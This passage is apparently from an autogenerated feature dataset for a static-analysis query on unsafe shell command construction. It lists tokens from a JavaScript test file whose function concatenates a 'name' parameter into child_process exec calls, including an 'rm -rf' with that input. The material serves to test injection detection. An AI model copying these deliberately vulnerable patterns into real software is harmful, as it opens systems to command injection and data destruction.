Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:3 | cp | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:8 | cp.exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:32 | cp.exec ... + "\\"") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:32 | cp.exec ... + "\\"") | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:32 | cp.exec ... + "\\"") | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:32 | cp.exec ... + "\\"") | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:32 | cp.exec ... + "\\"") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:32 | exceptional return of cp.exec ... + "\\"") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:32 | exceptional return of cp.exec ... + "\\"") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:32 | exceptional return of cp.exec ... + "\\"") | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:32 | exceptional return of cp.exec ... + "\\"") | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:32 | exceptional return of cp.exec ... + "\\"") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:5:73:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:5:73:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:5:73:8 | exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:5:73:8 | exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:5:73:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:17 | "cat \\"" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:17 | "cat \\"" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:17 | "cat \\"" | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:17 | "cat \\"" | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:17 | "cat \\"" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:17 | "cat \\"" | stringConcatenatedWith | -endpoint- name + '"' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:24 | "cat \\"" + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:24 | "cat \\"" + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:24 | "cat \\"" + name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:24 | "cat \\"" + name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:24 | "cat \\"" + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:21:73:24 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:21:73:24 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:21:73:24 | name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:21:73:24 | name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:21:73:24 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:21:73:24 | name | stringConcatenatedWith | 'cat "' -endpoint- '"' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:28:73:31 | "\\"" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:28:73:31 | "\\"" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:28:73:31 | "\\"" | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:28:73:31 | "\\"" | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:28:73:31 | "\\"" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:28:73:31 | "\\"" | stringConcatenatedWith | 'cat "' + name -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:3 | cp | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:8 | cp.exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:30 | cp.exec ... + "'") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:30 | cp.exec ... + "'") | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:30 | cp.exec ... + "'") | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:30 | cp.exec ... + "'") | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:30 | cp.exec ... + "'") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:30 | exceptional return of cp.exec ... + "'") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 